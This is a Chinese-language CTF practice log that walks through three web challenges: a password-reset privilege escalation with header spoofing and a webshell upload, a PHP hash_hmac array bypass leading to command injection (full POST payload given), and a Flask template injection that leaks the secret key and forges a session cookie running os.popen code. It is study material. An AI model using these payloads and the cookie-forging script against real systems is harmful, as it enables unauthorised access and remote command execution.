刷题记录（五）

攻防世界-bug

启动环境发现有登陆、注册、找回密码三个功能

随便注册一个用户

登陆以后，点击管理发现后台做了检测，非admin不让用

在初始界面有一个findpwd的链接，发现修改密码的时候会携带用户名，尝试将用户名改成admin看是否存在越权

改成admin，成功修改，再用admin账号进行登陆。访问admin时报了ip不允许，抓包加X-Forwarded-for: 127.0.0.1。

模块与文件相关猜测存在文件上传功能

上传木马，经过测试上传的结果为：

buuctf-blackcat

给了一首歌听，下载mp3文件后，用strings命令进行查看，得到以下源码：

if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('
$clandestine = getenv("clandestine");
if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
    die('
echo exec("nc".$_POST['One-ear']);

后台接收POST参数Black-Cat-Sheriff，White-cat-monitor和One-ear。
hash_hmac($algo,$data,$key)函数：
当传入的$data是数组时，该函数返回结果为null，那么可以通过控制One-ear的值来控制第二次hash_hmac函数的结果。
用One-ear参数传递要执行的命令，可以在要执行的命令前加;闭合nc命令。
提前计算出$hh的值，将其赋值给Black-Cat-Sheriff。
最后将White-cat-monitor以数组的形式传递。
payload：

White-cat-monitor[]=0&Black-Cat-Sheriff=afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b&One-ear=;env

buuctf-Supercalc 1

启动环境，是一个计算器，可以进行正常的运算操作，当输入0/0的时候有错误回显：

尝试模板注入：0/0{{1+1}}，页面报错

可以用注释符#进行绕过：0/0#{{1+1}}

请求包里存在session字段，用session_manager进行解密，看里面的内容：

code字段就是服务端python脚本执行的代码。
查看session加密的密钥：0/0{{config}}

拿到session加密密钥以后编写python脚本构造session：

from flask.sessions import SecureCookieSessionInterface
secret_key = "your secret key"
class FakeApp:
    secret_key = secret_key
fake_app = FakeApp()
session_interface = SecureCookieSessionInterface()
serializer = session_interface.get_signing_serializer(fake_app)
cookie = serializer.dumps(
    {"history": [{"code": '__import__("os").popen("ls").read()'}]}
)
print(cookie)
#eyJoaXN0b3J5IjpbeyJjb2RlIjoiX19pbXBvcnRfXyhcIm9zXCIpLnBvcGVuKFwibHNcIikucmVhZCgpIn1dfQ.ZO1lyw.ECpyaaSGzONPgKTrr4LgSx5CR9w

再构造session执行cat flag.txt命令，即可得到flag。